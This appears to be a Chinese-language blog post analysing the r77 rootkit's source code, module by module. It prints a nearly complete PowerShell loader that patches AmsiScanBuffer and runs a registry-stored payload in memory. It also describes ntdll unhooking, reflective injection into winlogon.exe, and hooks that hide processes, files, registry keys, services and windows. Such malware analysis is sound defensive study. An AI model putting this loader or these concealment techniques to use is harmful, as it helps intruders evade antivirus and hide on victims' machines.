<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="r77rootkit整体流程 各模块实现installer获取自身 .rsrc 段里的 Stager.exe 原始字节并写入注册表 HKLM\SOFTWARE\$77stager中  通过 CreateServiceW创建自启动服务执行powershell命令 cmd.exe &#x2F;c &quot;powershell.exe -Command &quot;&quot;...&quot;&amp;quot">
<meta property="og:type" content="article">
<meta property="og:title" content="r77-rootkit源码分析">
<meta property="og:url" content="https://exploo0osion.github.io/2026/03/26/2026-03-26-r77rootkit/index.html">
<meta property="og:site_name" content="wooo~ Exploooosion&#39;s blog">
<meta property="og:description" content="r77rootkit整体流程 各模块实现installer获取自身 .rsrc 段里的 Stager.exe 原始字节并写入注册表 HKLM\SOFTWARE\$77stager中  通过 CreateServiceW创建自启动服务执行powershell命令 cmd.exe &#x2F;c &quot;powershell.exe -Command &quot;&quot;...&quot;&amp;quot">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://exploo0osion.github.io/image/2026-03-26-r77rootkit/1774500130542.png">
<meta property="og:image" content="https://exploo0osion.github.io/image/2026-03-26-r77rootkit/1774501191989.png">
<meta property="og:image" content="https://exploo0osion.github.io/image/2026-03-26-r77rootkit/1774507042518.png">
<meta property="og:image" content="https://exploo0osion.github.io/image/2026-03-26-r77rootkit/1774510120945.png">
<meta property="og:image" content="https://exploo0osion.github.io/image/2026-03-26-r77rootkit/1774510713820.png">
<meta property="og:image" content="https://exploo0osion.github.io/image/2026-03-26-r77rootkit/1774510867219.png">
<meta property="og:image" content="https://exploo0osion.github.io/image/2026-03-26-r77rootkit/1774511200959.png">
<meta property="og:image" content="https://exploo0osion.github.io/image/2026-03-26-r77rootkit/1774512986490.png">
<meta property="article:published_time" content="2026-03-25T16:00:00.000Z">
<meta property="article:modified_time" content="2026-03-30T09:01:58.744Z">
<meta property="article:author" content="Exploooosion">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://exploo0osion.github.io/image/2026-03-26-r77rootkit/1774500130542.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>r77-rootkit源码分析</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
		<script type="text/x-mathjax-config">
		  MathJax.Hub.Config({
			tex2jax: {
			  skipTags: ['script', 'noscript', 'style', 'textarea', 'pre'],
			  inlineMath: [['$','$']]
			}
		  });
		</script>
		<script src='https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/latest.js?config=TeX-MML-AM_CHTML' async></script>
	
<meta name="generator" content="Hexo 8.1.1"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/categories/">Category</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/friends/">friends</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2026/03/28/2026-03-28-Csharpreverse_1/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2026/03/18/2026-03-18-learning_windows_8/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://exploo0osion.github.io/2026/03/26/2026-03-26-r77rootkit/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://exploo0osion.github.io/2026/03/26/2026-03-26-r77rootkit/&text=r77-rootkit源码分析"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://exploo0osion.github.io/2026/03/26/2026-03-26-r77rootkit/&title=r77-rootkit源码分析"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://exploo0osion.github.io/2026/03/26/2026-03-26-r77rootkit/&is_video=false&description=r77-rootkit源码分析"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=r77-rootkit源码分析&body=Check out this article: https://exploo0osion.github.io/2026/03/26/2026-03-26-r77rootkit/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://exploo0osion.github.io/2026/03/26/2026-03-26-r77rootkit/&title=r77-rootkit源码分析"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://exploo0osion.github.io/2026/03/26/2026-03-26-r77rootkit/&title=r77-rootkit源码分析"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://exploo0osion.github.io/2026/03/26/2026-03-26-r77rootkit/&title=r77-rootkit源码分析"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://exploo0osion.github.io/2026/03/26/2026-03-26-r77rootkit/&title=r77-rootkit源码分析"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://exploo0osion.github.io/2026/03/26/2026-03-26-r77rootkit/&name=r77-rootkit源码分析&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://exploo0osion.github.io/2026/03/26/2026-03-26-r77rootkit/&t=r77-rootkit源码分析"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#r77rootkit"><span class="toc-number">1.</span> <span class="toc-text">r77rootkit</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%95%B4%E4%BD%93%E6%B5%81%E7%A8%8B"><span class="toc-number">1.1.</span> <span class="toc-text">整体流程</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%90%84%E6%A8%A1%E5%9D%97%E5%AE%9E%E7%8E%B0"><span class="toc-number">1.2.</span> <span class="toc-text">各模块实现</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#installer"><span class="toc-number">1.2.1.</span> <span class="toc-text">installer</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#stager"><span class="toc-number">1.2.2.</span> <span class="toc-text">stager</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#service"><span class="toc-number">1.2.3.</span> <span class="toc-text">service</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#rootkit"><span class="toc-number">1.2.4.</span> <span class="toc-text">rootkit</span></a></li></ol></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        r77-rootkit源码分析
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">Exploooosion</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2026-03-25T16:00:00.000Z" class="dt-published" itemprop="datePublished">2026-03-26</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/malware/">malware</a> › <a class="category-link" href="/categories/malware/windows/">windows</a>
    </div>


      

    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <span id="more"></span>

<h1 id="r77rootkit"><a href="#r77rootkit" class="headerlink" title="r77rootkit"></a>r77rootkit</h1><h2 id="整体流程"><a href="#整体流程" class="headerlink" title="整体流程"></a>整体流程</h2><p><img src="/image/2026-03-26-r77rootkit/1774500130542.png" alt="1774500130542"></p>
<h2 id="各模块实现"><a href="#各模块实现" class="headerlink" title="各模块实现"></a>各模块实现</h2><h3 id="installer"><a href="#installer" class="headerlink" title="installer"></a>installer</h3><p>获取自身 <code>.rsrc</code> 段里的 <code>Stager.exe</code> 原始字节并写入注册表 <code>HKLM\SOFTWARE\$77stager</code>中</p>
<p><img src="/image/2026-03-26-r77rootkit/1774501191989.png" alt="1774501191989"></p>
<p>通过 <code>CreateServiceW</code>创建自启动服务执行powershell命令 <code>cmd.exe /c &quot;powershell.exe -Command &quot;&quot;...&quot;&quot;&quot;</code></p>
<p>具体功能是 patch  <code>AmsiScanBuffer</code> 的函数入口，直接让函数返回 <code>0x80070057</code>，然后从 <code>HKLM\SOFTWARE\$77stager</code> 键值中读取数据并在内存中加载，在 <code>EntryPoint</code>处执行</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">Get-Delegate</span><span class="params">(<span class="variable">$ParameterTypes</span>, <span class="variable">$ReturnType</span>)</span></span> &#123;</span><br><span class="line">    <span class="variable">$TypeBuilder</span> = [<span class="type">AppDomain</span>]::CurrentDomain</span><br><span class="line">        .DefineDynamicAssembly((<span class="built_in">New-Object</span> Reflection.AssemblyName(<span class="string">&#x27;ReflectedDelegate&#x27;</span>)),</span><br><span class="line">                               [<span class="type">Reflection.Emit.AssemblyBuilderAccess</span>]::Run)</span><br><span class="line">        .DefineDynamicModule(<span class="string">&#x27;InMemoryModule&#x27;</span>, <span class="variable">$False</span>)</span><br><span class="line">        .DefineType(<span class="string">&#x27;MyDelegateType&#x27;</span>,</span><br><span class="line">                    <span class="string">&#x27;Class,Public,Sealed,AnsiClass,AutoClass&#x27;</span>,</span><br><span class="line">                    [<span class="type">MulticastDelegate</span>])</span><br><span class="line"></span><br><span class="line">    <span class="variable">$TypeBuilder</span>.DefineConstructor(<span class="string">&#x27;RTSpecialName,HideBySig,Public&#x27;</span>,</span><br><span class="line">                                   [<span class="type">Reflection.CallingConventions</span>]::Standard,</span><br><span class="line">                                   <span class="variable">$ParameterTypes</span>).SetImplementationFlags(<span class="string">&#x27;Runtime,Managed&#x27;</span>)</span><br><span class="line"></span><br><span class="line">    <span class="variable">$TypeBuilder</span>.DefineMethod(<span class="string">&#x27;Invoke&#x27;</span>,</span><br><span class="line">                              <span class="string">&#x27;Public,HideBySig,NewSlot,Virtual&#x27;</span>,</span><br><span class="line">                              <span class="variable">$ReturnType</span>,</span><br><span class="line">                              <span class="variable">$ParameterTypes</span>).SetImplementationFlags(<span class="string">&#x27;Runtime,Managed&#x27;</span>)</span><br><span class="line"></span><br><span class="line">    <span class="variable">$TypeBuilder</span>.CreateType()</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$NativeMethods</span> = ([<span class="type">AppDomain</span>]::CurrentDomain.GetAssemblies() |</span><br><span class="line">    <span class="built_in">Where-Object</span> &#123;</span><br><span class="line">        <span class="variable">$_</span>.GlobalAssemblyCache <span class="operator">-and</span></span><br><span class="line">        <span class="variable">$_</span>.Location.Split(<span class="string">&#x27;\&#x27;</span>)[-<span class="number">1</span>].Equals(<span class="string">&#x27;System.dll&#x27;</span>)</span><br><span class="line">    &#125;).GetType(<span class="string">&#x27;Microsoft.Win32.UnsafeNativeMethods&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="variable">$GetProcAddress</span> = <span class="variable">$NativeMethods</span>.GetMethod(</span><br><span class="line">    <span class="string">&#x27;GetProcAddress&#x27;</span>,</span><br><span class="line">    [<span class="type">Reflection.BindingFlags</span>](<span class="string">&#x27;Public,Static&#x27;</span>),</span><br><span class="line">    <span class="variable">$Null</span>,</span><br><span class="line">    [<span class="type">Reflection.CallingConventions</span>]::Any,</span><br><span class="line">    <span class="selector-tag">@</span>((<span class="built_in">New-Object</span> IntPtr).GetType(), [<span class="built_in">string</span>]),</span><br><span class="line">    <span class="variable">$Null</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="variable">$LoadLibraryDelegate</span>   = <span class="built_in">Get-Delegate</span> <span class="selector-tag">@</span>([<span class="built_in">String</span>])([<span class="built_in">Int</span><span class="type">Ptr</span>])</span><br><span class="line"><span class="variable">$VirtualProtectDelegate</span> = <span class="built_in">Get-Delegate</span> <span class="selector-tag">@</span>([<span class="built_in">Int</span><span class="type">Ptr</span>],[<span class="type">UIntPtr</span>],[<span class="type">UInt32</span>],[<span class="type">UInt32</span>].MakeByRefType())([<span class="built_in">Bool</span>])</span><br><span class="line"></span><br><span class="line"><span class="variable">$Kernel32Ptr</span>       = <span class="variable">$NativeMethods</span>.GetMethod(<span class="string">&#x27;GetModuleHandle&#x27;</span>).Invoke(<span class="variable">$Null</span>, <span class="selector-tag">@</span>([<span class="type">Object</span>](<span class="string">&#x27;kernel32.dll&#x27;</span>)))</span><br><span class="line"><span class="variable">$LoadLibraryPtr</span>    = <span class="variable">$GetProcAddress</span>.Invoke(<span class="variable">$Null</span>, <span class="selector-tag">@</span>([<span class="type">Object</span>]<span class="variable">$Kernel32Ptr</span>, [<span class="type">Object</span>](<span class="string">&#x27;LoadLibraryA&#x27;</span>)))</span><br><span class="line"><span class="variable">$VirtualProtectPtr</span> = <span class="variable">$GetProcAddress</span>.Invoke(<span class="variable">$Null</span>, <span class="selector-tag">@</span>([<span class="type">Object</span>]<span class="variable">$Kernel32Ptr</span>, [<span class="type">Object</span>](<span class="string">&#x27;VirtualProtect&#x27;</span>)))</span><br><span class="line"></span><br><span class="line"><span class="variable">$AmsiPtr</span> = [<span class="type">Runtime.InteropServices.Marshal</span>]::GetDelegateForFunctionPointer(</span><br><span class="line">    <span class="variable">$LoadLibraryPtr</span>, <span class="variable">$LoadLibraryDelegate</span></span><br><span class="line">).Invoke(<span class="string">&#x27;amsi.dll&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="variable">$AmsiScanBufferPtr</span> = <span class="variable">$GetProcAddress</span>.Invoke(<span class="variable">$Null</span>, <span class="selector-tag">@</span>([<span class="type">Object</span>]<span class="variable">$AmsiPtr</span>, [<span class="type">Object</span>](<span class="string">&#x27;AmsiScanBuffer&#x27;</span>)))</span><br><span class="line"></span><br><span class="line"><span class="variable">$OldProtect</span> = <span class="number">0</span></span><br><span class="line">[<span class="type">Runtime.InteropServices.Marshal</span>]::GetDelegateForFunctionPointer(</span><br><span class="line">    <span class="variable">$VirtualProtectPtr</span>, <span class="variable">$VirtualProtectDelegate</span></span><br><span class="line">).Invoke(<span class="variable">$AmsiScanBufferPtr</span>, [<span class="type">uint32</span>]<span class="number">8</span>, <span class="number">4</span>, [<span class="type">ref</span>]<span class="variable">$OldProtect</span>)</span><br><span class="line"></span><br><span class="line">[<span class="type">Runtime.InteropServices.Marshal</span>]::<span class="built_in">Copy</span>([<span class="built_in">Byte</span>[]](&lt;补丁字节&gt;), <span class="number">0</span>, <span class="variable">$AmsiScanBufferPtr</span>, &lt;补丁长度&gt;)</span><br><span class="line"></span><br><span class="line">[<span class="type">Runtime.InteropServices.Marshal</span>]::GetDelegateForFunctionPointer(</span><br><span class="line">    <span class="variable">$VirtualProtectPtr</span>, <span class="variable">$VirtualProtectDelegate</span></span><br><span class="line">).Invoke(<span class="variable">$AmsiScanBufferPtr</span>, [<span class="type">uint32</span>]<span class="number">8</span>, <span class="number">0</span>x20, [<span class="type">ref</span>]<span class="variable">$OldProtect</span>)</span><br><span class="line"></span><br><span class="line">[<span class="type">Reflection.Assembly</span>]::Load(</span><br><span class="line">    [<span class="type">Microsoft.Win32.Registry</span>]::LocalMachine.OpenSubkey(<span class="string">&#x27;SOFTWARE&#x27;</span>).GetValue(<span class="string">&#x27;$77stager&#x27;</span>)</span><br><span class="line">).EntryPoint.Invoke(<span class="variable">$Null</span>, <span class="variable">$Null</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>其中会对该powershell脚本做了些混淆：</p>
<p><code>WriteDummyShellCodeBytes</code>会随机插入一些无实际效果的指令，例如：</p>
<ul>
<li><code>mov eax, eax</code></li>
<li><code>mov ebx, ebx</code></li>
<li><code>add eax, 0</code></li>
<li><code>sub edx, 0</code></li>
</ul>
<p><code>WriteShellCodeBytes</code>把每个机器码字节写成:</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[<span class="built_in">Byte</span>](a+b)</span><br></pre></td></tr></table></figure>

<p>所有用反引号包起来的字符串，比如：</p>
<ul>
<li><code>`amsi.dll`</code></li>
<li><code>`AmsiScanBuffer`</code></li>
<li><code>`kernel32.dll`</code></li>
</ul>
<p>会被改写成形如，或其它随机组合：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&#x27;a&#x27;</span>+[<span class="built_in">Char</span>](<span class="number">109</span>)+<span class="string">&#x27;s&#x27;</span>+<span class="string">&#x27;i&#x27;</span>+...</span><br></pre></td></tr></table></figure>

<p>脚本中的变量名都会被替换成相同长度的随机字符串。</p>
<h3 id="stager"><a href="#stager" class="headerlink" title="stager"></a>stager</h3><p>卸载dll挂钩：直接重新读系统文件上的ntdll.dll的文件内容并映射，将其.text节来替换当前进程所加载的ntdll.dll模块所在内存的.text节。</p>
<p>从内嵌资源中读取 <code>Dll32</code>、<code>Dll64</code>、<code>Service32</code>、<code>Service64</code>。对资源做解密和 GZip 解压。把 <code>r77-x86.dll</code>、<code>r77-x64.dll</code> 写入 <code>HKLM\SOFTWARE\$77dll32/$77dll64</code>。把 Service DLL 反射式注入到 <code>winlogon.exe</code>（使用NtCreateThreadEx注入）。</p>
<p><img src="/image/2026-03-26-r77rootkit/1774507042518.png" alt="1774507042518"></p>
<h3 id="service"><a href="#service" class="headerlink" title="service"></a>service</h3><p>service.dll中会先进行unhook（对 winlogon进程加载的所有dll），脱钩会读取系统文件上的dll的文件内容（这里采用间接系统调用的方式），将.text段上的PointerToRawData替换当前的内存映射</p>
<p><img src="/image/2026-03-26-r77rootkit/1774510120945.png" alt="1774510120945"></p>
<p>打开 <code>HKLM\SOFTWARE</code>，读取 <code>$77dll32</code>、<code>$77dll64</code>。</p>
<p>创建 <code>HKLM\SOFTWARE\$77config</code>，并把 DACL 放宽到普通用户也可写。</p>
<p><img src="/image/2026-03-26-r77rootkit/1774510713820.png" alt="1774510713820"></p>
<p>启动三个线程：</p>
<ul>
<li><p>子进程监听线程：监听 <code>\\.\pipe\$77childproc</code>，管道中读取的内容是子进程的PID，然后会向其注入 <code>$77dll32</code>或 <code>$77dll64</code>，在后续模块里会去hook NtResumeThread这个位于r3层底层的进程创建函数，修改后的逻辑里面会创建对应管道，并写入被创建的子进程PID</p>
<p><img src="/image/2026-03-26-r77rootkit/1774510867219.png" alt="1774510867219"></p>
</li>
<li><p>新进程轮询线程：每 100ms 枚举一次新进程，与上一次枚举结果比对，对新出现的 PID 回调注入dll</p>
<p><img src="/image/2026-03-26-r77rootkit/1774511200959.png" alt="1774511200959"></p>
</li>
<li><p>控制管道线程：监听 <code>\\.\pipe\$77control</code></p>
</li>
</ul>
<p>读取配置里的 <code>startup</code> 项，逐个 <code>ShellExecuteW</code> 启动。</p>
<h3 id="rootkit"><a href="#rootkit" class="headerlink" title="rootkit"></a>rootkit</h3><p>真正被注入到各业务进程中的 <code>r77.dll</code> 会做三件事：</p>
<ul>
<li>写入 <code>R77_SIGNATURE</code>，避免重复注入。</li>
<li>启动配置刷新线程，每秒从注册表重新加载一次配置。</li>
<li>用 Detours 安装一组覆盖面很广的 Hook。</li>
</ul>
<p><img src="/image/2026-03-26-r77rootkit/1774512986490.png" alt="1774512986490"></p>
<h4 id="进程隐藏与CPU使用率隐藏"><a href="#进程隐藏与CPU使用率隐藏" class="headerlink" title="进程隐藏与CPU使用率隐藏"></a>进程隐藏与CPU使用率隐藏</h4><p>这一类能力由 <code>HookedNtQuerySystemInformation</code>实现。</p>
<h5 id="隐藏进程"><a href="#隐藏进程" class="headerlink" title="隐藏进程"></a>隐藏进程</h5><p>当 <code>systemInformationClass == SystemProcessInformation</code> 时，Hook 会遍历 <code>SYSTEM_PROCESS_INFORMATION</code> 链表，当条件项满足时会将当前项从链表中跳过。</p>
<p>隐藏判定条件包括：</p>
<ul>
<li>进程名带 <code>$77</code> 前缀</li>
<li>PID 在配置的 <code>HiddenProcessIds</code> 中</li>
<li>进程名在配置的 <code>HiddenProcessNames</code> 中</li>
</ul>
<h5 id="隐藏进程-CPU-使用率"><a href="#隐藏进程-CPU-使用率" class="headerlink" title="隐藏进程 CPU 使用率"></a>隐藏进程 CPU 使用率</h5><p>同一个 Hook 在另外两个 <code>SystemInformationClass</code> 分支中继续工作：</p>
<ul>
<li><code>SystemProcessorPerformanceInformation</code></li>
<li><code>SystemProcessorIdleCycleTimeInformation</code></li>
</ul>
<p>在过滤进程链表时，顺手累计隐藏进程的 <code>KernelTime</code>、<code>UserTime</code>、<code>CycleTime</code>，然后把这些时间补到 <code>System Idle Process</code>，还会调用 <code>GetProcessHiddenTimes()</code> 再次显式统计隐藏进程时间。</p>
<h4 id="子进程注入"><a href="#子进程注入" class="headerlink" title="子进程注入"></a>子进程注入</h4><p>这一类能力由 <code>HookedNtResumeThread</code>实现。</p>
<p>Hook 先通过线程句柄拿到对应的子进程 PID。判断这是不是当前进程自己的线程；如果是则忽略。</p>
<p>直接调用 <code>InjectDll()</code> 完成注入或者通过 <code>\\.\pipe\$77childproc</code> 把 PID 发给 Service。</p>
<h4 id="文件、目录与命名管道隐藏"><a href="#文件、目录与命名管道隐藏" class="headerlink" title="文件、目录与命名管道隐藏"></a>文件、目录与命名管道隐藏</h4><p>这一类能力由 <code>HookedNtQueryDirectoryFile</code>和 <code>HookedNtQueryDirectoryFileEx</code>共同实现。</p>
<p>隐藏判定条件包括：</p>
<ul>
<li>文件名本身带 <code>$77</code> 前缀</li>
<li>拼接得到的完整路径命中配置中的 <code>HiddenPaths</code></li>
</ul>
<p>代码里先判断 <code>GetFileType(fileHandle) == FILE_TYPE_PIPE</code>，如果是 pipe，就把目录路径视为 <code>\\.\pipe\</code> 然后再把 pipe 名称拼进去，继续走和文件&#x2F;目录一样的路径隐藏判断。</p>
<p>如果调用者要求返回单项，就循环继续调用原函数，跳过所有隐藏项，直到拿到第一个可见项</p>
<p>如果调用者一次拿到的是多项链表，就对缓冲区逐项检查，并在命中隐藏条件时用 <code>memcpy/memmove</code> 把后面的项整体前移</p>
<p>如果隐藏的是最后一项，就把上一项的 <code>NextEntryOffset</code> 设为 0</p>
<h4 id="注册表隐藏"><a href="#注册表隐藏" class="headerlink" title="注册表隐藏"></a>注册表隐藏</h4><p>这由三组 Hook 协同实现：</p>
<ul>
<li><code>HookedNtQueryKey</code></li>
<li><code>HookedNtEnumerateKey</code></li>
<li><code>HookedNtEnumerateValueKey</code></li>
</ul>
<h5 id="修正子键数和值数"><a href="#修正子键数和值数" class="headerlink" title="修正子键数和值数"></a>修正子键数和值数</h5><p><code>HookedNtQueryKey</code> 负责保持计数一致性，即使后面的枚举 Hook 会把隐藏项删掉，但如果 <code>NtQueryKey(KeyFullInformation / KeyCachedInformation)</code> 返回的 <code>SubKeys</code> 和 <code>Values</code> 仍然是原始计数，很多工具还是会察觉异常。</p>
<h5 id="隐藏子键"><a href="#隐藏子键" class="headerlink" title="隐藏子键"></a>隐藏子键</h5><p><code>HookedNtEnumerateKey</code> 负责实际过滤注册表子键。</p>
<ul>
<li>子键名带 <code>$77</code></li>
<li>完整路径命中 <code>HiddenRegistryPaths</code></li>
<li>如果当前路径位于 <code>HKLM\SYSTEM\ControlSetXXX\Services</code>，还会额外按 <code>HiddenServiceNames</code> 过滤</li>
</ul>
<h5 id="隐藏值"><a href="#隐藏值" class="headerlink" title="隐藏值"></a>隐藏值</h5><p><code>HookedNtEnumerateValueKey</code> 负责实际过滤注册表键值。</p>
<ul>
<li>值名带 <code>$77</code></li>
<li>完整注册表路径命中 <code>HiddenRegistryPaths</code></li>
</ul>
<h4 id="窗口隐藏"><a href="#窗口隐藏" class="headerlink" title="窗口隐藏"></a>窗口隐藏</h4><p>这由 <code>HookedNtUserBuildHwndList</code>实现。</p>
<p>让枚举窗口句柄数组的调用者看不到属于隐藏进程的窗口</p>
<p>先调用原始 <code>NtUserBuildHwndList</code> 得到 HWND 数组，遍历每个 HWND用 <code>GetWindowThreadProcessId</code> 找到所属进程，再按以下条件判断该窗口是否应隐藏：</p>
<ul>
<li>PID 在隐藏列表</li>
<li>进程名在隐藏列表</li>
<li>进程名带 <code>$77</code></li>
</ul>
<p>命中后用 <code>memmove</code> 把后续 HWND 前移，并递减 <code>itemCount</code></p>
<h4 id="服务隐藏"><a href="#服务隐藏" class="headerlink" title="服务隐藏"></a>服务隐藏</h4><p>这由以下 Hook 共同实现：</p>
<ul>
<li><code>HookedEnumServicesStatusA</code></li>
<li><code>HookedEnumServicesStatusW</code></li>
<li><code>HookedEnumServiceGroupW</code></li>
<li><code>HookedEnumServicesStatusExA</code></li>
<li><code>HookedEnumServicesStatusExW</code></li>
<li><code>HookedEnumServicesStatusExW2</code></li>
</ul>
<p>为了覆盖不同程序和不同系统版本：</p>
<ul>
<li><code>services.msc</code> 会走 <code>EnumServiceGroupW</code></li>
<li>Windows 7 的任务管理器和 Process Hacker 会走 <code>EnumServicesStatusExW</code></li>
<li>Windows 10 某些版本会从 <code>sechost.dll</code> 导出 <code>EnumServicesStatusExW</code></li>
</ul>
<h5 id="实现方式"><a href="#实现方式" class="headerlink" title="实现方式"></a>实现方式</h5><p>这组 Hook 的结构很一致：</p>
<ul>
<li>先调用原始服务枚举 API</li>
<li>再把返回的服务数组交给统一 helper 处理：<ul>
<li><code>FilterEnumServiceStatusA</code></li>
<li><code>FilterEnumServiceStatusW</code></li>
<li><code>FilterEnumServiceStatusProcessA</code></li>
<li><code>FilterEnumServiceStatusProcessW</code></li>
</ul>
</li>
</ul>
<p>这些 helper 会检查：</p>
<ul>
<li><code>lpServiceName</code></li>
<li><code>lpDisplayName</code></li>
</ul>
